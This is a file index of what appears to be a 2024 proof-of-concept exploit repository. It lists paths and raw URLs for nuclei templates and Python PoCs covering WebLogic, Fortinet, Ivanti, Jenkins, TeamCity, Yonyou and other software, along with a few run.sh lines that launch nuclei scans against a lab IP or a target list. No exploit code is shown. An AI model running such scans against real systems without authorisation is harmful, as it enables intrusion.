√/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/test.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/test.py -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/test.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/test.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/复现.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/run.sh: -------------------------------------------------------------------------------- 1 | nuclei -u 192.168.136.130:8080 -t ./CVE-2024-23334.yaml 2 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/复现.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/复现.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-21762 Fortinet FortiOS和FortiProxy 越界写入漏洞 √/CVE-2024-21762.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-21762 Fortinet FortiOS和FortiProxy 越界写入漏洞 √/CVE-2024-21762.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-21762 Fortinet FortiOS和FortiProxy 越界写入漏洞 √/run.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-21762 Fortinet FortiOS和FortiProxy 越界写入漏洞 √/run.sh -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-21762 Fortinet FortiOS和FortiProxy 越界写入漏洞 √/复现.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-21762 Fortinet FortiOS和FortiProxy 越界写入漏洞 √/复现.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-21893 Ivanti Connect Secure SSRF to RCE漏洞 √/CVE-2024-21893.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-21893 Ivanti Connect Secure SSRF to RCE漏洞 √/CVE-2024-21893.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-21893 Ivanti Connect Secure SSRF to RCE漏洞 √/run.sh: -------------------------------------------------------------------------------- 1 | nuclei -u 192.168.136.130:8080 -t ./CVE-2024-23334.yaml 2 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-21893 Ivanti Connect Secure SSRF to RCE漏洞 √/复现.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-21893 Ivanti Connect Secure SSRF to RCE漏洞 √/复现.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/CVE-2024-23334.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/CVE-2024-23334.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/poc.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/poc.py -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/run.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/run.sh -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/复现.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √/复现.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23897 Jenkins任意文件读取导致远程代码执行漏洞 √/CVE-2024-23897.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23897 Jenkins任意文件读取导致远程代码执行漏洞 √/CVE-2024-23897.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23897 Jenkins任意文件读取导致远程代码执行漏洞 √/run.sh: -------------------------------------------------------------------------------- 1 | cat targets.txt | nuclei -t .\CVE-2024-23897.yaml 2 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23897 Jenkins任意文件读取导致远程代码执行漏洞 √/复现.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23917 TeamCity 权限绕过漏洞 √/CVE-2024-23917.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23917 TeamCity 权限绕过漏洞 √/CVE-2024-23917.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23917 TeamCity 权限绕过漏洞 √/run.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23917 TeamCity 权限绕过漏洞 √/run.sh -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-23917 TeamCity 权限绕过漏洞 √/复现.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-23917 TeamCity 权限绕过漏洞 √/复现.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-27198 JetBrains TeamCity 身份验证绕过漏洞 √/CVE-2024-27198.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-27198 JetBrains TeamCity 身份验证绕过漏洞 √/CVE-2024-27198.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-4040-CrushFTP 认证绕过模板注入漏洞 √/CVE-2024-4040.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-4040-CrushFTP 认证绕过模板注入漏洞 √/CVE-2024-4040.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-4040-CrushFTP 认证绕过模板注入漏洞 √/test_vul.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-4040-CrushFTP 认证绕过模板注入漏洞 √/test_vul.py -------------------------------------------------------------------------------- /2024-4-30/IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103) √/TVE-2024-104261620.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103) √/TVE-2024-104261620.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞/TVE-2024-105081747.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞/TVE-2024-105081747.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP A++Cloud 政府财务云的download接口任意文件读取/TVE-2024-105092009.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP A++Cloud 政府财务云的download接口任意文件读取/TVE-2024-105092009.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件-logs日志泄漏漏洞/TVE-2024-105091948.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件-logs日志泄漏漏洞/TVE-2024-105091948.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件-obr_zdybxd_check.jsp存在SQL注入漏洞/TVE-2024-105091524.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件-obr_zdybxd_check.jsp存在SQL注入漏洞/TVE-2024-105091524.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件-sqcxIndex.jsp-SQL注入漏洞/TVE-2024-105091630.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件-sqcxIndex.jsp-SQL注入漏洞/TVE-2024-105091630.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件ListSelectDialogServlet存在SQL注入漏洞/TVE-2024-105091450.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件ListSelectDialogServlet存在SQL注入漏洞/TVE-2024-105091450.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件Proxy接口存在SQL注入漏洞/TVE-2024-105091430.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件Proxy接口存在SQL注入漏洞/TVE-2024-105091430.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件UploadFileData存在任意文件上传漏洞/TVE-2024-105091117.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件UploadFileData存在任意文件上传漏洞/TVE-2024-105091117.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件operOriztion存在SQL注入漏洞/TVE-2024-105091558.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件operOriztion存在SQL注入漏洞/TVE-2024-105091558.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件services的userInfoWeb存在SQL注入漏洞/TVE-2024-105091726.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件services的userInfoWeb存在SQL注入漏洞/TVE-2024-105091726.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件services的userInfoWeb存在SQL注入漏洞/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件services的userInfoWeb存在SQL注入漏洞/image.png -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件services的userInfoWeb存在SQL注入漏洞/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件services的userInfoWeb存在SQL注入漏洞/image2.png -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件ufgovbank 存在XML实体注入漏洞/TVE-2024-105091650.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件ufgovbank 存在XML实体注入漏洞/TVE-2024-105091650.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友GRP-U8内控管理软件存在SQL(u8qx-slbmbygr.jsp)注入漏洞/TVE-2024-105091615.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友GRP-U8内控管理软件存在SQL(u8qx-slbmbygr.jsp)注入漏洞/TVE-2024-105091615.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC PaWfm2接口SQL注入漏洞 未完成/TVE-2024-105082219.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC PaWfm2接口SQL注入漏洞 未完成/TVE-2024-105082219.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC PaWfm接口SQL注入漏洞/TVE-2024-105082014.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC PaWfm接口SQL注入漏洞/TVE-2024-105082014.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC mp-uploadControl存在文件上传漏洞/TVE-2024-105092320.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC mp-uploadControl存在文件上传漏洞/TVE-2024-105092320.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC saveDoc.ajax 存在任意文件上传漏洞/TVE-2024-105091345.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC saveDoc.ajax 存在任意文件上传漏洞/TVE-2024-105091345.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC workflowService接口的sql注入漏洞/TVE-2024-105082134.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC workflowService接口的sql注入漏洞/TVE-2024-105082134.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC-avatar接口存在文件上传漏洞/TVE-2024-105092222.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC-avatar接口存在文件上传漏洞/TVE-2024-105092222.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC-down-billSQL注入漏洞/TVE-2024-105082118.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC-down-billSQL注入漏洞/TVE-2024-105082118.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC-runStateServlet 接口sql注入漏洞/TVE-2024-105082230.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC-runStateServlet 接口sql注入漏洞/TVE-2024-105082230.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NCCloud_importhttpscer接口存在任意文件上传漏洞/TVE-2024-105092118.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NCCloud_importhttpscer接口存在任意文件上传漏洞/TVE-2024-105092118.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NCCloud_runScript存在SQL注入漏洞/TVE-2024-105100017.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NCCloud_runScript存在SQL注入漏洞/TVE-2024-105100017.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC_saveImageServlet接口存在文件上传漏洞/TVE-2024-105100046.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC_saveImageServlet接口存在文件上传漏洞/TVE-2024-105100046.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC及NC Cloud系统的ActionServlet的sql注入漏洞/TVE-2024-105092047.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC及NC Cloud系统的ActionServlet的sql注入漏洞/TVE-2024-105092047.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友NC及NC Cloud系统的wsncapplet.jsp信息泄漏漏洞/TVE-2024-105082250.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友NC及NC Cloud系统的wsncapplet.jsp信息泄漏漏洞/TVE-2024-105082250.yaml -------------------------------------------------------------------------------- /2024-5-11/2024用友POC/用友U8cloud系统ExportUfoFormatAction接口存在SQL注入漏洞/TVE-2024-105091150.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/2024用友POC/用友U8cloud系统ExportUfoFormatAction接口存在SQL注入漏洞/TVE-2024-105091150.yaml -------------------------------------------------------------------------------- /2024-5-11/WordPress WP-Recall 插件 = 16.26.5 - SQL 注入漏洞 (CVE-2024-32709) √/CVE-2024-32709.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/WordPress WP-Recall 插件 = 16.26.5 - SQL 注入漏洞 (CVE-2024-32709) √/CVE-2024-32709.yaml -------------------------------------------------------------------------------- /2024-5-11/Wordpress Bricks Builder 主题插件代码执行漏洞(CVE-2024-25600)/CVE-2024-32709.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/Wordpress Bricks Builder 主题插件代码执行漏洞(CVE-2024-25600)/CVE-2024-32709.yaml -------------------------------------------------------------------------------- /2024-5-11/ZenTao PMS 项目管理系统身份认证绕过漏洞2024-04-25√/TVE-2024-105071319.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/ZenTao PMS 项目管理系统身份认证绕过漏洞2024-04-25√/TVE-2024-105071319.yaml -------------------------------------------------------------------------------- /2024-5-11/kkFileView 任意文件上传致远程代码执行漏洞(国产)√/TVE-2024-105061349.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/kkFileView 任意文件上传致远程代码执行漏洞(国产)√/TVE-2024-105061349.yaml -------------------------------------------------------------------------------- /2024-5-11/kkFileView 任意文件上传致远程代码执行漏洞(国产)√/kkfileview_poc.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/kkFileView 任意文件上传致远程代码执行漏洞(国产)√/kkfileview_poc.py -------------------------------------------------------------------------------- /2024-5-11/kkFileView 任意文件上传致远程代码执行漏洞(国产)√/test2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-11/kkFileView 任意文件上传致远程代码执行漏洞(国产)√/test2.zip -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/test.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/test.py -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/test.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/test.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友-时空KSOA linkadd.jsp sql注入漏洞/TVE-2024-105132211.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友-时空KSOA linkadd.jsp sql注入漏洞/TVE-2024-105132211.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友NC complainbilldetail SQL注入漏洞/TVE-2024-105171554.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友NC complainbilldetail SQL注入漏洞/TVE-2024-105171554.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友NC downTax-download SQL注入漏洞复现/TVE-2024-105171730.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友NC downTax-download SQL注入漏洞复现/TVE-2024-105171730.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友NC printBill 任意文件读取-删除漏洞/TVE-2024-105151607.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友NC printBill 任意文件读取-删除漏洞/TVE-2024-105151607.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友NC registerServlet接口存在JNDI注入漏洞/TVE-2024-105161407.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友NC registerServlet接口存在JNDI注入漏洞/TVE-2024-105161407.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友NC saveXmlToFIleServlet接口的任意文件上传漏洞/TVE-2024-105131024.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友NC saveXmlToFIleServlet接口的任意文件上传漏洞/TVE-2024-105131024.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友NC workflowImageServlet和importPml接口的sql注入漏洞/TVE-2024-105131645.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友NC workflowImageServlet和importPml接口的sql注入漏洞/TVE-2024-105131645.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞/TVE-2024-105131740.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞/TVE-2024-105131740.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞/image.png -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8cloud所有版本RegisterServlet接口存在SQL注入漏洞/TVE-2024-105132041.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8cloud所有版本RegisterServlet接口存在SQL注入漏洞/TVE-2024-105132041.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8cloud所有版本TableInputOperServlet反序列化漏洞/TVE-2024-105131859.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8cloud所有版本TableInputOperServlet反序列化漏洞/TVE-2024-105131859.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8cloud所有版本TableInputOperServlet反序列化漏洞/test.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8cloud所有版本TableInputOperServlet反序列化漏洞/test.py -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8cloud系统-ArchiveVerify存在SQL注入漏洞/TVE-2024-105131721.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8cloud系统-ArchiveVerify存在SQL注入漏洞/TVE-2024-105131721.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8cloud系统-base64-API接口存在SQL注入漏洞/TVE-2024-105132100.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8cloud系统-base64-API接口存在SQL注入漏洞/TVE-2024-105132100.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8cloud系统KeyWordDetailReportQuery和KeyWordReportQuery接口存在SQL注入漏洞/TVE-2024-105131730.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8cloud系统KeyWordDetailReportQuery和KeyWordReportQuery接口存在SQL注入漏洞/TVE-2024-105131730.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U8cloud系统MeasureQueryByToolAction接口存在SQL注入漏洞/TVE-2024-105132120.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U8cloud系统MeasureQueryByToolAction接口存在SQL注入漏洞/TVE-2024-105132120.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U9-PatchFile.asmx接口存在任意文件上传漏洞/TVE-2024-105132128.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U9-PatchFile.asmx接口存在任意文件上传漏洞/TVE-2024-105132128.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友U9-UMWebService.asmx存在任意文件读取漏洞/TVE-2024-105141328.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友U9-UMWebService.asmx存在任意文件读取漏洞/TVE-2024-105141328.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友u8crm-swfupload接口存在任意文件上传漏洞/TVE-2024-105141350.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友u8crm-swfupload接口存在任意文件上传漏洞/TVE-2024-105141350.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友政务A++V8系列FileDownload任意文件下载漏洞/TVE-2024-105132151.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友政务A++V8系列FileDownload任意文件下载漏洞/TVE-2024-105132151.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞/TVE-2024-105141630.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞/TVE-2024-105141630.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞/TVE-2024-105141700.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞/TVE-2024-105141700.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友移动管理平台uploadIcon任意文件上传漏洞/TVE-2024-105141010.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友移动管理平台uploadIcon任意文件上传漏洞/TVE-2024-105141010.yaml -------------------------------------------------------------------------------- /2024-5-17/2024用友poc/用友移动系统管理平台getFileLocal接口存在任意文件读取漏洞/TVE-2024-105141035.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/2024用友poc/用友移动系统管理平台getFileLocal接口存在任意文件读取漏洞/TVE-2024-105141035.yaml -------------------------------------------------------------------------------- /2024-5-17/AJ-Report数据大屏系统 verification 存在认证绕过导致远程命令执行漏洞/TVE-2024-105161530.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/AJ-Report数据大屏系统 verification 存在认证绕过导致远程命令执行漏洞/TVE-2024-105161530.yaml -------------------------------------------------------------------------------- /2024-5-17/EasyCVR 视频管理平台存在信息泄露漏洞/TVE-2024-005161049.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-5-17/EasyCVR 视频管理平台存在信息泄露漏洞/TVE-2024-005161049.yaml -------------------------------------------------------------------------------- /2024-5-17/中移铁通禹路由器信息泄露漏洞/TVE-2024-005151717.yaml: -------------------------------------------------------------------------------- 